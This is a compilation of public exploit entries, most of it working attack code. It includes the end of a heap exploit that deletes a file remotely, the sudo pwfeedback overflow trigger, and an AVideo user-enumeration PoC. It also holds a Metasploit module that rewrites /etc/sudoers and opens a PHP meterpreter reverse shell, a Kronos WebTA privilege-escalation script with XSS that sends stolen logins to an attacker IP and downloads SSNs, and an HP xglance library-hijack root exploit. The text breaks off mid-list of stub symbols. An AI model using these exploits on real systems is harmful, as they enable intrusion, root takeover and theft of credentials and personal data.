payload += p32(0x1d) # Fast bin chunk overwrite
payload += "A"* 488 # Padding
payload += p32(0xdda00771) # Address of payload
payload += p32(0xdda00771+4) # Junk
r = send_payload(payload)
def massage_heap(filename):
print "Trying to massage the heap....."
for x in xrange(100):
payload = ""
payload += p32(0x0) # Needed to bypass checks
payload += p32(0x0) # Needed to bypass checks
payload += p32(0xdda0077d) # Points to where the filename will be in memory
payload += filename + "\x00"
payload += "C"*(0x300-len(payload))
r = send_payload(payload, content_len=0x80000, nofun=True)
r.close()
cut_conn = True
print "Heap massage done"
if __name__ == "__main__":
if len(sys.argv) != 3:
print "Usage: ./{} <victim_ip> <file_to_remove>".format(sys.argv[0])
print "Run `export PWNLIB_SILENT=1` for disabling verbose connections"
exit()
massage_heap(sys.argv[2])
time.sleep(1)
trigger_exploit()
print "Exploit finished. {} is now removed and remote process should be crashed".format(sys.argv[2])
# Title: Sudo 1.8.25p - Buffer Overflow
# Date: 2020-01-30
# Author: Joe Vennix
# Software: Sudo
# Versions: Sudo versions prior to 1.8.26
# CVE: CVE-2019-18634
# Reference: https://www.sudo.ws/alerts/pwfeedback.html
# Sudo's pwfeedback option can be used to provide visual feedback when the user is inputting
# their password. For each key press, an asterisk is printed. This option was added in
# response to user confusion over how the standard Password: prompt disables the echoing
# of key presses. While pwfeedback is not enabled by default in the upstream version of sudo,
# some systems, such as Linux Mint and Elementary OS, do enable it in their default sudoers files.
# Due to a bug, when the pwfeedback option is enabled in the sudoers file, a user may be able to trigger a stack-based buffer overflow.
# This bug can be triggered even by users not listed in the sudoers file. There is no impact unless pwfeedback has been enabled.
The folowing sudoers configuration is vulnerable:
$ sudo -l
Matching Defaults entries for millert on linux-build:
insults, pwfeedback, mail_badpass, mailerpath=/usr/sbin/sendmail
User millert may run the following commands on linux-build:
(ALL : ALL) ALL
# Exploiting the bug does not require sudo permissions, merely that pwfeedback be enabled.
# The bug can be reproduced by passing a large input to sudo via a pipe when it prompts for a password.
$ perl -e 'print(("A" x 100 . "\x{00}") x 50)' | sudo -S id
Password: Segmentation fault
If pwfeedback is enabled in sudoers, the stack overflow may allow unprivileged users to escalate to the root account.
# Exploit Title: AVideo Platform 8.1 - Information Disclosure (User Enumeration)
# Dork: N/A
# Date: 2020-02-05
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://avideo.com
# Software Link: https://github.com/WWBN/AVideo
# Version: 8.1
# Tested on: Linux
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/objects/playlistsFromUser.json.php?users_id=[ID]
#
................
0
id 92
user "admin"
name "Watch Later"
email "user@localhost"
password "bc79a173cc20f0897db1c5b004588db9"
created "2019-05-16 21:42:42"
modified "2019-05-16 21:42:42"
isAdmin 1
status "watch_later"
photoURL "videos/userPhoto/photo1.png"
lastLogin "2020-02-03 08:11:08"
recoverPass "0ce70c7b006c78552fee993adeaafadf"
................
#
# Hash function to be converted ....
#
function encryptPassword($password, $noSalt = false) {
global $advancedCustom, $global, $advancedCustomUser;
if (!empty($advancedCustomUser->encryptPasswordsWithSalt) && !empty($global['salt']) && empty($noSalt)) {
$password .= $global['salt'];
}
return md5(hash("whirlpool", sha1($password)));
}
#
# Exploit Title: Wago PFC200 - Authenticated Remote Code Execution (Metasploit)
# Date: 2020-02-05
# Exploit Author: Nico Jansen (0x483d)
# Vendor Homepage: https://www.wago.com/
# Version: <= Firmare 11 (02_08_35)
# Tested on: Linux
# CVE : N/A
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'json'
class MetasploitModule < Msf::Exploit::Remote
#Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Wago PFC200 authenticated remote code execution',
'Description' => %q{
The Wago PFC200 (up to incl. Firmware 11 02_08_35) is vulnerable to an authenticated remote code execution in the
administrative web interface. By exploiting the vulnerability, an attacker is able to run system commands in root context.
To execute this module, login credenials of the website administrator are required (default: admin/wago).
This module was tested against a Wago 750-8202 Firmware 11 (02_08_35) but other PFC200 models may be affected as well.
},
'Author' =>
[
'Nico Jansen (0x483d)' # Vulnerability discovery and MSF module
],
'License' => MSF_LICENSE,
'Platform' => 'php',
'References' =>
[
['CVE', '-'],
['US-CERT-VU', '-'],
['URL', '-'],
['URL', '-']
],
'DisclosureDate' => 'Aug 1 2018',
'Privileged' => true,
'DefaultOptions' => {
'PAYLOAD' => 'php/meterpreter/reverse_tcp',
'SSL' => true,
},
'Targets' => [
['Automatic', {}]
],
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(443),
OptString.new('ADMINPASSWORD', [true, 'Password to authenticate as admin', 'wago']),
])
deregister_options('VHOST')
end
# This function checks the index page to check if it may be a valid device.
# There are some more checks done after an successful authentication
def check
@csrf=""
res = send_request_cgi(
'method' => 'GET',
'uri' => '/wbm/index.php'
)
if res && res.code == 200 && res.body.to_s =~ /WAGO Ethernet Web-based Management/
result = sendConfigToolMessage("get_typelabel_value", ["SYSDESC"])
if result and result =~ /PFC200/
# Get Version and check if it's <= 11
result = sendConfigToolMessage("get_coupler_details", ["firmware-revision"])
result = result.split('(')[1]
result = result.split(')')[0]
if Integer(result) <= 11
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
end
return Exploit::CheckCode::Safe
end
return Exploit::CheckCode::Safe
end
# This function authenticates the adminuser against the Wago PLC
def login
res = send_request_cgi(
'method' => 'POST',
'uri' => '/wbm/login.php',
'data' => '{"username":"admin","password":"' + datastore['ADMINPASSWORD'] + '"}'
)
if res.code != 200
return false
end
parsed_json = JSON.parse(res.body.to_s)
if parsed_json["status"] == 0
@cookie = res.get_cookies
@csrf = parsed_json["csrfToken"]
return true
else
return false
end
end
# This function can be used to execute arbitary commands after login
def sendConfigToolMessage(scriptname, parameters, expectResponse=true)
parameterString = ''
for param in parameters
parameterString = parameterString + '"' + param + '", '
end
parameterString = parameterString[0...-2]
request ='{"csrfToken":"' + @csrf + '",'\
'"renewSession":true,"aDeviceParams":{"0"'\
':{"name":"' + scriptname + '","parameter":['\
+ parameterString + '],"sudo":true,"multiline":false,'\
'"timeout":12000,"dataId":0}}}'
res = send_request_cgi(
'method' => 'POST',
'uri' => '/wbm/configtools.php',
'data' => request,
'cookie' => @cookie,
)
# After exploitation, there is no response, so just return true because the message was sent
if expectResponse == false
return true
end
parsed_json = JSON.parse(res.body.to_s)
@csrf = parsed_json["csrfToken"]
if parsed_json["aDeviceResponse"][0]["status"] == 0
return parsed_json["aDeviceResponse"][0]["resultString"]
else
return false
end
end
# This function is used to enable php execution in sudoers file using sed
def change_sudo_permissions()
return sendConfigToolMessage('/../../../usr/bin/sed',["-i", "s/NOPASSWD:/NOPASSWD:ALL#/", "/etc/sudoers"])
end
# Encode a given string to bypass validation
def encode(content)
result = ""
content.split("").each do |i|
result = result + "chr(" + (i.ord).to_s + ")."
end
result = result[0...-1]
return result
end
# This function generates the required payload used to connect to the msf listener
def send_payload()
meterpreter_reverse_php='exec("/usr/bin/sed -i \'s/NOPASSWD:ALL#/NOPASSWD:/\' \'/etc/sudoers\'"); $ip = "' + datastore['LHOST'] + '"; $port = ' + datastore['LPORT'].to_s + '; '\
'if (($f = "stream_socket_client") && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); '\
'$s_type = "stream"; } if (!$s && ($f = "fsockopen") && is_callable($f)) { $s = $f($ip, $port);'\
' $s_type = "stream"; } if (!$s && ($f = "socket_create") && is_callable($f)) '\
'{ $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) '\
'{ die(); } $s_type = "socket"; } if (!$s_type) { die("no socket funcs"); } '\
'if (!$s) { die("no socket"); } switch ($s_type) { case "stream": $len = fread($s, 4); break; '\
'case "socket": $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len);'\
' $len = $a["len"]; $b = ""; while (strlen($b) < $len) { switch ($s_type) { case "stream": $b .= '\
'fread($s, $len-strlen($b)); break; case "socket": $b .= socket_read($s, $len-strlen($b)); break; } } '\
'$GLOBALS["msgsock"] = $s; $GLOBALS["msgsock_type"] = $s_type; if (extension_loaded("suhosin") '\
'&& ini_get("suhosin.executor.disable_eval")) { $suhosin_bypass=create_function("", $b); $suhosin_bypass(); } '\
'else { eval($b); } die(); ?>'
command = "eval(" + encode(meterpreter_reverse_php) + ");"
return sendConfigToolMessage("/../../../usr/bin/php5", ["-r", command], false)
end
def exploit
if check == Exploit::CheckCode::Vulnerable # Check if the system may be a PFC200
print_good("Target seems to be a vulnerable PFC200 device")
if login # Try to authenticate using the given credentials
print_good("Successfully logged in as website admin")
if change_sudo_permissions()
print_good("Manipulated the /etc/sudoers file to enable php execution as root")
print_good("Preparing meterpreter payload and undoing changes to /etc/sudoers...")
send_payload()
else
print_error("Unable to modify the /etc/sudoers file...")
end
else
print_error("Unable to login as admin with the given credentials...")
end
else
print_error("Target is not a valid PFC200 device. Will exit now...")
end
end
end
# Exploit Title: Kronos WebTA 4.0 - Authenticated Remote Privilege Escalation
# Discovered by: Elwood Buck & Nolan B. Kennedy of Mindpoint Group
# Exploit Author: Nolan B. Kennedy (nxkennedy)
# Discovery date: 2019-09-20
# Vendor Homepage: https://www.kronos.com/products/kronos-webta
# Version: 3.8.x - 4.0 affected. (Exploit tested on v3.8.6.79029)
# Tested on: Linux
# CVE: (Remote Privesc) CVE-2020-8495 | (Stored XSS) CVE-2020-8493
# Usage: python3 exploit.py http://target
#!/bin/bash/python3
###
# *Exploit requires credentials with Timekeeper or Supervisor privileges
#
# Exploit abuses delegation privs present in the WebTA "/servlet/com.threeis.webta.H491delegate"
# servlet. By specifying the "delegate" and "delegatorUserId" parameter an attacker can use an
# admin user id to delegate role 5 (aka admin privs) to any other known user id, including oneself.
#
# selFunc=add&selRow=&delegate=<ATTACKER>&delegateRole=5&delegatorEmpId=1234&delegatorUserId=<ADMIN>
#
# With our new admin account, we can abuse a stored XSS vulnerability present in the login page,
# banner (displayed on every page) & password reset page. We can also pull system information and
# download a file containing the FULL NAME AND SSN OF EVERY USER in the database (typically thousands).
#
#
# Below is an example of the exploit output:
#####
# [+] Logged in as 'TESTER' with roles: Employee, Timekeeper
#
# [+] Available Admin Accounts:
# MOTOKO
# BATOU
# TOGUSA
# ISHIKAWA
#
# [-] Attempting to use account 'MOTOKO' to delegate Admin privs to 'TESTER'...
#
# [+] 'TESTER' successfully elevated to Admin privs :)
#
#
# [+] Logged in as 'TESTER' with roles: Employee, Timekeeper, Admin
#
# [+] Webta Version Information
# Site parameter: company
# Licensed modules:WEBTA-LEAVE, WEBTA, WEBTA
# webTA Servlet Version: 3.8.6.79029
# webTA Database Version: 3.8.6.79029
# App Server OS: Linux version 3.10.0-1062.1.1.el7.x86_64 (amd64)
# App Server JDK Version: Oracle Corporation version 1.8.0_222
# App Server Servlet Engine: Apache Tomcat/7.0.76 (Servlet API 3.0)
# App Server JDBC Driver: Oracle JDBC driver version 11.2.0.4.0
# Database Version: Oracle JDBC driver version 11.2.0.4.0
# Database Connection: jdbc:oracle:thin:@//foo.rds.amazonaws.com:1521/webtadb<br>connected as user WEBTASVC
#
# [-] Downloading names and SSNs...
#
# [+] Complete. 5020 users written to file 'WebTA-PII.xls'
# [+] Sample Content:
# USERID,Last Name,First Name,Middle Name,SSN,Supervisor ID,Timekeeper ID,Organization,Pay Period,Active Status,
# MOTOKO,Kusanagi,Major,M.,987-65-4321,ARAMAKI,ARAMAKI,SECTION9,19,Active,
#
# [+] Stored XSS attack complete :)
#####
import re
from requests import Request, Session
from sys import argv, exit
banner = """###
# Kronos WebTA 3.8.x - 4.0 Authenticated Remote Privilege Escalation & Stored XSS Exploit
# Discovered by: Elwood Buck & Nolan B. Kennedy of Mindpoint Group
# Exploit Author: Nolan B. Kennedy (nxkennedy)
# Discovery date: 20 SEPT 2019
# Vendor Homepage: https://www.kronos.com/products/kronos-webta
# Version: 3.8.x - 4.0 affected. (Exploit tested on v3.8.6.79029)
# Tested on: Linux
# CVE: (Remote Privesc) CVE-2020-8494 | (Stored XSS) CVE-2020-8493
# Usage: python3 exploit.py http://target
###"""
base_url = argv[1]
username = "TESTER"
password = "password!1234"
# set to True if you want to also exploit Stored XSS
xss = False
# xss strings can be injected into 3 different 'banner' locations (feel free to modify content)
# WILL NOT ERASE CONTENT ALREADY IN APPLICATION
xss_login_page = """
<script>
/* steals login creds each time a user logs in and forwards them to attacker ip */
var attacker = "192.168.1.3";
/* don't forget to set up a listener (python3 -m http.server 80) */
function stealCreds() {
var username = document.frm[1].value;
var password = document.frm[2].value;
img = new Image();
img.src = "http://"+attacker+"/?"+ "username=" +username+ "&" + "password=" +escape(password);
setTimeout('document.frm.submit();', 1000);
return false;
}
function readyToSteal() {
document.frm.onsubmit = stealCreds;
}
/* special for WebTA because otherwise the script loads before the DOM and password form */
document.addEventListener("DOMContentLoaded", readyToSteal);
</script>
"""
xss_banner_everypage = ""
xss_passwordchange_page = ""
s = Session()
adm_list = []
def web_req(url, data):
print()
req = Request('POST', url, data=data)
prepared = s.prepare_request(req)
resp = s.send(prepared, allow_redirects=True, verify=False)
return resp
def killActiveSession():
url = base_url + "/servlet/com.threeis.webta.H111multipleLogin"
data = {"selFunc":"continue"}
resp = web_req(url, data)
def checkPrivs():
url = base_url + "/servlet/com.threeis.webta.HGateway"
data = {}
resp = web_req(url, data)
html = resp.text
activeSession = roles = re.findall(r'(.*?)You have an active session open at a another browser(.*?)\.', html)
roles = re.findall(r'(.*?)type\="button"(.*?)>', html)
if activeSession:
print("[-] Killing active session...")
killActiveSession()
login()
elif roles:
roles_list = []
for role in roles:
role = role[1].split('"')[1]
roles_list.append(role)
print("[+] Logged in as '{}' with roles: {}".format(username, ', '.join(roles_list)))
else:
print("[!] Account does not have required Timekeeper or Supervisor privs")
exit()
def login():
url = base_url + "/servlet/com.threeis.webta.H110login"
data = {"j_username": username, "j_password": password, "login": "++Log+In++"}
resp = web_req(url, data)
if resp.status_code != 200:
print("[!] Failed login in as '{}'".format(username))
exit()
checkPrivs()
def findAdmins():
url = base_url + "/servlet/com.threeis.webta.H940searchUser"
data = {
"selFunc":"search",
"return_page":"com.threeis.webta.P491delegate",
"return_variable":"delegate",
"search_org":"0",
"search_role":"Administrator",
"actingRole":"2",
"payload_name_0":"selFunc",
"payload_val_0":"search",
"payload_name_1":"selRow",
"payload_name_2":"delegate",
"payload_name_3":"delegateRole",
"payload_val_3":"2",
"payload_name_4":"delegatorEmpId",
"payload_val_4":"15667", # might need a valid user id
"payload_name_5":"delegatorUserId",
"payload_val_5":username,
}
resp = web_req(url, data)
html = resp.text
adm_usrs = re.findall(r'<TD CLASS\="bckGray">(.*?)\n', html)
print("[+] Available Admin Accounts:")
for snip in adm_usrs:
adm = snip.split('</TD><TD CLASS="bckGray">')[2]
adm_list.append(adm)
print(adm)
def privesc():
url = base_url + "/servlet/com.threeis.webta.H491delegate"
data = {
"selFunc":"add",
"delegate":username,
"delegateRole":"5",
"delegatorEmpId":"1234",
"delegatorUserId":adm_list[0],
}
print()
print("[-] Attempting to use account '{}' to delegate Admin privs to '{}'...".format(adm_list[0], username))
resp = web_req(url, data)
print("[+] '{}' successfully elevated to Admin privs :)".format(username))
def storeXSS():
url = base_url + "/servlet/com.threeis.webta.H261configMenu"
data = {'selFunc':'messages'}
### to be covert we want to append our js to the end of * messages/banners already there *
resp = web_req(url, data)
html = resp.text
messages = re.findall(r'<TEXTAREA name\=(.*?)</textarea>', html, re.DOTALL)
messages_clean = []
for message in messages:
message = message.split('wrap="virtual">')[1]
messages_clean.append(message)
login_page = messages_clean[0]
banner_everypage = messages_clean[1]
passwordchange_page = messages_clean[2]
### now we inject our javascript
url = base_url + "/servlet/com.threeis.webta.H201config"
data = {
"selFunc":"save",
"loginMessage": login_page + xss_login_page,
"bannerMessage": banner_everypage + xss_banner_everypage,
"passwordMessage": passwordchange_page + xss_passwordchange_page,
}
resp = web_req(url, data)
print("[+] Stored XSS attack complete :)")
def stealPII():
url = base_url + "/servlet/com.threeis.webta.H287userRoleReport"
data = {
"selFunc":"downloademp",
"roletype":"1",
"orgsel":"0",
"pageNum":"1",
}
print("[-] Downloading names and SSNs...")
resp = web_req(url, data)
filename = "WebTA-PII.xls"
with open(filename, 'wb') as f:
f.write(resp.content)
with open(filename) as f:
for i, l in enumerate(f):
pass
count = i # does not include header
print("[+] Complete. {} users written to file '{}'".format(count, filename))
print("[+] Sample Content:")
with open(filename) as f:
for n in range(2):
print(",".join(f.readline().split("\t")), end="")
def dumpSysInfo():
url = base_url + "/servlet/com.threeis.webta.H200mnuAdmin"
data = {"selFunc":"about"}
resp = web_req(url, data)
html = resp.text
data = re.findall(r'<INPUT VALUE\="(.*?)"', html, re.DOTALL)
print("[+] " + data[0])
if __name__ == '__main__':
print(banner)
login()
findAdmins()
privesc()
login() # login again because we need the refreshed perms after privesc
dumpSysInfo()
#stealPII()
if xss:
storeXSS()
s.close()
# Exploit Title: xglance-bin 11.00 - Privilege Escalation
# Exploit Author: Robert Jaroszuk and Marco Ortisi (RedTimmy Security)
# Date: 2020-02-01
# Tested on: RHEL 5.x/6.x/7.x/8.x
# CVE: CVE-2014-2630
# Disclamer: This exploit is for educational purpose only
# More details on https://redtimmysec.wordpress.com/2020/02/04/perf-exploiter/
#
#!/bin/sh
echo "[*] Hewlett-Packard Performance Monitoring for Open System Environments exploit by Robert Jaroszuk and Marco Ortisi (RedTimmy Security)"
echo
echo "[+] Preparing the code..."
cat > lib.c << DONE
#define _GNU_SOURCE
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <stdio.h>
#include <dlfcn.h>
void __cxa_finalize (void *d) {
return;
}
void __attribute__((constructor)) init() {
setresuid(geteuid(), geteuid(), geteuid());
printf("Hewlett-Packard Performance Monitoring for Open System Environments exploit by Robert Jaroszuk and Marco Ortisi (RedTimmy Security)\n");
printf("CVE-2014-2630\n");
fflush(stdout);
execl("/bin/sh", (char *)NULL, (char *)NULL);
}
int applicationShellClassRec = 0;
int applicationShellWidgetClass = 0;
int colorConvertArgs = 0;
int compositeWidgetClass = 0;
int constraintClassRec = 0;
int constraintWidgetClass = 0;
int coreWidgetClass = 0;
int dump_external = 0;
int dump_fontlist = 0;
int dump_fontlist_cache = 0;
int dump_internal = 0;
int FcPatternAddInteger = 0;
int FcPatternAddString = 0;
int FcPatternCreate = 0;
int FcPatternDestroy = 0;
int GetWidgetNavigPtrs = 0;
int InitializeScrollBars = 0;
int _ITM_deregisterTMCloneTable = 0;
int _ITM_registerTMCloneTable = 0;
int jpeg_calc_output_dimensions = 0;
int jpeg_CreateDecompress = 0;
int jpeg_destroy_decompress = 0;
int jpeg_finish_decompress = 0;
int jpeg_read_header = 0;
int jpeg_read_scanlines = 0;
int jpeg_start_decompress = 0;
int jpeg_std_error = 0;
int jpeg_stdio_src = 0;
int load_jpeg = 0;
int localeconv = 0;
int __longjmp_chk = 0;
int nl_langinfo = 0;
int NumLockMask = 0;
int objectClass = 0;
int objectClassRec = 0;
int overrideShellClassRec = 0;
int png_create_info_struct = 0;
int png_create_read_struct = 0;
int png_destroy_read_struct = 0;
int png_get_channels = 0;
int png_get_gAMA = 0;
int png_get_IHDR = 0;
int png_get_rowbytes = 0;
int png_get_valid = 0;
int png_init_io = 0;
int png_read_end = 0;
int png_read_image = 0;
int png_read_info = 0;
int png_read_update_info = 0;
int png_set_expand = 0;
int png_set_gamma = 0;
int png_set_gray_to_rgb = 0;
int png_set_longjmp_fn = 0;
int png_set_sig_bytes = 0;
int png_set_strip_16 = 0;
int png_sig_cmp = 0;
int rectObjClass = 0;
int rectObjClassRec = 0;
int ScrollLockMask = 0;
int SetMwmStuff = 0;
int T = 0;
int topLevelShellWidgetClass = 0;
int transientShellClassRec = 0;
int transientShellWidgetClass = 0;
int V = 0;
int vendorShellClassRec = 0;
int vendorShellWidgetClass = 0;
int W = 0;
int __wctomb_chk = 0;
int widgetClass = 0;
int widgetClassRec = 0;
int wmShellClassRec = 0;
int wmShellWidgetClass = 0;
int XAddExtension = 0;
int XAllocColor = 0;
int XAllocColorCells = 0;
int XAllowEvents = 0;
int XBell = 0;
int XChangeActivePointerGrab = 0;
int XChangeGC = 0;
int XChangeProperty = 0;
int XChangeWindowAttributes = 0;
int XCheckIfEvent = 0;
int XCheckMaskEvent = 0;
int XClearArea = 0;
int XClearWindow = 0;
int XCloseDisplay = 0;
int XCloseIM = 0;
int XConfigureWindow = 0;
int XConvertSelection = 0;
int XCopyArea = 0;
int XCopyPlane = 0;
int XCreateBitmapFromData = 0;
int XCreateFontCursor = 0;
int XCreateGC = 0;
int XCreateIC = 0;
int XCreateImage = 0;
int XCreatePixmap = 0;
int XCreatePixmapCursor = 0;
int XCreatePixmapFromBitmapData = 0;
int XCreateRegion = 0;
int XCreateWindow = 0;
int XDefaultColormap = 0;
int XDefaultDepth = 0;
int XDefaultScreen = 0;
int XDefaultVisual = 0;
int XDefineCursor = 0;
int XDeleteContext = 0;
int XDeleteProperty = 0;
int XDestroyIC = 0;
int XDestroyRegion = 0;
int XDestroyWindow = 0;
int XDisplayKeycodes = 0;
int XDisplayOfScreen = 0;
int XDisplayString = 0;
int XDrawArc = 0;
int XDrawImageString = 0;
int XDrawImageString16 = 0;
int XDrawLine = 0;
int XDrawLines = 0;
int XDrawPoint = 0;
int XDrawRectangle = 0;
int XDrawSegments = 0;
int XDrawString = 0;
int XDrawString16 = 0;
int _XEditResGet16 = 0;
int _XEditResGet32 = 0;
int _XEditResGet8 = 0;
int _XEditResGetSigned16 = 0;
int _XEditResGetString8 = 0;
int _XEditResGetWidgetInfo = 0;
int _XEditResPut16 = 0;
int _XEditResPut32 = 0;
int _XEditResPut8 = 0;
int _XEditResPutString8 = 0;
int _XEditResPutWidgetInfo = 0;
int _XEditResResetStream = 0;
int XEmptyRegion = 0;
int XEqualRegion = 0;
int XESetCloseDisplay = 0;
int XExtentsOfFontSet = 0;
int XFetchBuffer = 0;
int XFillArc = 0;
int XFillPolygon = 0;
int XFillRectangle = 0;
int XFillRectangles = 0;
int XFindContext = 0;
int XFlush = 0;
int XFontsOfFontSet = 0;
int XFree = 0;
int XFreeColors = 0;
int XFreeCursor = 0;
int XFreeFont = 0;
int XFreeFontNames = 0;
int XFreeGC = 0;
int XFreeModifiermap = 0;
int XFreePixmap = 0;
int XFreeStringList = 0;
int XftDrawCreate = 0;
int XftDrawCreateBitmap = 0;
int XftDrawDestroy = 0;
int XftDrawRect = 0;
int XftDrawSetClip = 0;
int XftDrawSetClipRectangles = 0;
int XftDrawString16 = 0;
int XftDrawString32 = 0;
int XftDrawStringUtf8 = 0;
int XftFontClose = 0;
int XftFontMatch = 0;
int XftFontOpenPattern = 0;
int XftTextExtents16 = 0;
int XftTextExtents32 = 0;
int XftTextExtents8 = 0;
int XftTextExtentsUtf8 = 0;
int XGetAtomName = 0;
int XGetFontProperty = 0;
int XGetGCValues = 0;
int XGetGeometry = 0;
int XGetICValues = 0;
int XGetImage = 0;
int XGetIMValues = 0;
int XGetInputFocus = 0;
int XGetKeyboardMapping = 0;
int XGetModifierMapping = 0;
int XGetOCValues = 0;
int XGetOMValues = 0;
int XGetSelectionOwner = 0;
int XGetWindowAttributes = 0;
int XGetWindowProperty = 0;
int XGetWMColormapWindows = 0;
int XGrabKeyboard = 0;
int XGrabPointer = 0;
int XGrabServer = 0;
int XHeightOfScreen = 0;
int xiColumnConstraintExtension = 0;
int XiCreateStippledPixmap = 0;
int _XiGetTabIndex = 0;
int XIMOfIC = 0;
int XInstallColormap = 0;
int XInternAtom = 0;
int XInternAtoms = 0;
int XIntersectRegion = 0;
int XiReleaseStippledPixmap = 0;
int _XiResolveAllPartOffsets = 0;
int XiResolveAllPartOffsets = 0;
int XKeysymToKeycode = 0;
int XKeysymToString = 0;
int XLastKnownRequestProcessed = 0;
int XListFonts = 0;
int XListInstalledColormaps = 0;
int XLoadQueryFont = 0;
int XLookupString = 0;
int Xm18IListUnselectAllItems = 0;
int Xm18IListUnselectItem = 0;
int _XmAccessColorData = 0;
int XmActivateProtocol = 0;
int _XmAddCallback = 0;
int _XmAddGrab = 0;
int _XmAddHashEntry = 0;
int XmAddProtocolCallback = 0;
int XmAddProtocols = 0;
int _Xm_AddQueue = 0;
int XmAddTabGroup = 0;
int _XmAddTearOffEventHandlers = 0;
int _XmAddToColorCache = 0;
int XmAddToPostFromList = 0;
int _XmAllocHashTable = 0;
int _XmAllocMotifAtom = 0;
int _XmAllocReceiverInfo = 0;
int _XmAllocScratchPixmap = 0;
int _XmAllowAcceleratedInsensitiveUnmanagedMenuItems = 0;
int XMapRaised = 0;
int XMapWindow = 0;
int _XmArrowB_defaultTranslations = 0;
int xmArrowButtonClassRec = 0;
int xmArrowButtonGadgetClass = 0;
int xmArrowButtonGadgetClassRec = 0;
int xmArrowButtonWidgetClass = 0;
int _XmArrowPixmapCacheCompare = 0;
int _XmArrowPixmapCacheDelete = 0;
int _XmAssignInsensitiveColor = 0;
int _XmAssignLabG_MarginBottom = 0;
int _XmAssignLabG_MarginHeight = 0;
int _XmAssignLabG_MarginLeft = 0;
int _XmAssignLabG_MarginRight = 0;
int _XmAssignLabG_MarginTop = 0;
int _XmAssignLabG_MarginWidth = 0;
int XMaxRequestSize = 0;
int _XmBackgroundColorDefault = 0;
int _XmBaseClassPartInitialize = 0;
int _XmBB_CreateButtonG = 0;
int _XmBB_CreateLabelG = 0;
int _XmBB_GetDialogTitle = 0;
int _XmBBUpdateDynDefaultButton = 0;
int XmbDrawImageString = 0;
int XmbDrawString = 0;
int _XmBlackPixel = 0;
int XmbLookupString = 0;
int _XmBottomShadowColorDefault = 0;
int XmbResetIC = 0;
int XmbTextEscapement = 0;
int XmbTextExtents = 0;
int XmbTextListToTextProperty = 0;
int XmbTextPropertyToTextList = 0;
int _XmBuildExtResources = 0;
int _XmBuildGadgetResources = 0;
int _XmBuildManagerResources = 0;
int _XmBuildPrimitiveResources = 0;
int _XmBuildResources = 0;
int _XmBulletinB_defaultTranslations = 0;
int _XmBulletinBoardCancel = 0;
int xmBulletinBoardClassRec = 0;
int _XmBulletinBoardFocusMoved = 0;
int _XmBulletinBoardMap = 0;
int _XmBulletinBoardReturn = 0;
int _XmBulletinBoardSetDefaultShadow = 0;
int _XmBulletinBoardSetDynDefaultButton = 0;
int _XmBulletinBoardSizeUpdate = 0;
int xmBulletinBoardWidgetClass = 0;
int xmButtonBoxClassRec = 0;
int xmButtonBoxWidgetClass = 0;
int _XmButtonPopdownChildren = 0;
int _XmButtonTakeFocus = 0;
int _XmByteOrderChar = 0;
int _XmCacheCopy = 0;
int _XmCacheDelete = 0;
int _XmCachePart = 0;
int _XmCachePixmap = 0;
int _XmCalcLabelDimensions = 0;
int _XmCalcLabelGDimensions = 0;
int _XmCallCallbackList = 0;
int _XmCallFocusMoved = 0;
int _XmCallRowColumnMapCallback = 0;
int _XmCallRowColumnUnmapCallback = 0;
int _XmCascadeB_menubar_events = 0;
int _XmCascadeB_p_events = 0;
int _XmCascadeBPrimClassExtRec = 0;
int xmCascadeButtonClassRec = 0;
int xmCascadeButtonGadgetClass = 0;
int xmCascadeButtonGadgetClassRec = 0;
int XmCascadeButtonGadgetHighlight = 0;
int xmCascadeButtonGCacheObjClassRec = 0;
int XmCascadeButtonHighlight = 0;
int xmCascadeButtonWidgetClass = 0;
int _XmCascadingPopup = 0;
int _XmCBHelp = 0;
int _XmCBNameActivate = 0;
int _XmCBNameValueChanged = 0;
int XmChangeColor = 0;
int _XmChangeHSB = 0;
int _XmChangeNavigationType = 0;
int _XmChangeVSB = 0;
int _XmCharsetCanonicalize = 0;
int _XmCleanPixmapCache = 0;
int _XmClearBCompatibility = 0;
int _XmClearBGCompatibility = 0;
int _XmClearBGPixmapName = 0;
int _XmClearBorder = 0;
int _XmClearDisplayTables = 0;
int _XmClearDragReceiverInfo = 0;
int _XmClearFocusPath = 0;
int _XmClearIconPixmapName = 0;
int _XmClearKbdFocus = 0;
int _XmClearRect = 0;
int _XmClearShadowType = 0;
int _XmClearTabGroup = 0;
int _XmClearTraversal = 0;
int XmClipboardBeginCopy = 0;
int XmClipboardCancelCopy = 0;
int XmClipboardCopy = 0;
int XmClipboardCopyByName = 0;
int XmClipboardEndCopy = 0;
int XmClipboardEndRetrieve = 0;
int XmClipboardInquireCount = 0;
int XmClipboardInquireFormat = 0;
int XmClipboardInquireLength = 0;
int XmClipboardInquirePendingItems = 0;
int XmClipboardLock = 0;
int _XmClipboardPassType = 0;
int XmClipboardRegisterFormat = 0;
int XmClipboardRetrieve = 0;
int XmClipboardStartCopy = 0;
int XmClipboardStartRetrieve = 0;
int XmClipboardUndoCopy = 0;
int XmClipboardUnlock = 0;
int XmClipboardWithdrawFormat = 0;
int xmClipWindowClassRec = 0;
int _XmClipWindowTranslationTable = 0;
int xmClipWindowWidgetClass = 0;
int _XmColorObjCache = 0;
int _XmColorObjCacheDisplay = 0;
int xmColorObjClass = 0;
int xmColorObjClassRec = 0;
int _XmColorObjCreate = 0;
int xmColorSelectorClassRec = 0;
int xmColorSelectorWidgetClass = 0;
int xmColumnClassRec = 0;
int xmColumnWidgetClass = 0;
int xmCombinationBox2ClassRec = 0;
int XmCombinationBox2GetArrow = 0;
int XmCombinationBox2GetChild = 0;
int XmCombinationBox2GetLabel = 0;
int XmCombinationBox2GetList = 0;
int XmCombinationBox2GetText = 0;
int XmCombinationBox2GetValue = 0;
int xmCombinationBox2WidgetClass = 0;
int XmCombinationBoxGetValue = 0;
int XmComboBoxAddItem = 0;
int xmComboBoxClassRec = 0;
int _XmComboBox_defaultAccelerators = 0;
int _XmComboBox_defaultTranslations = 0;
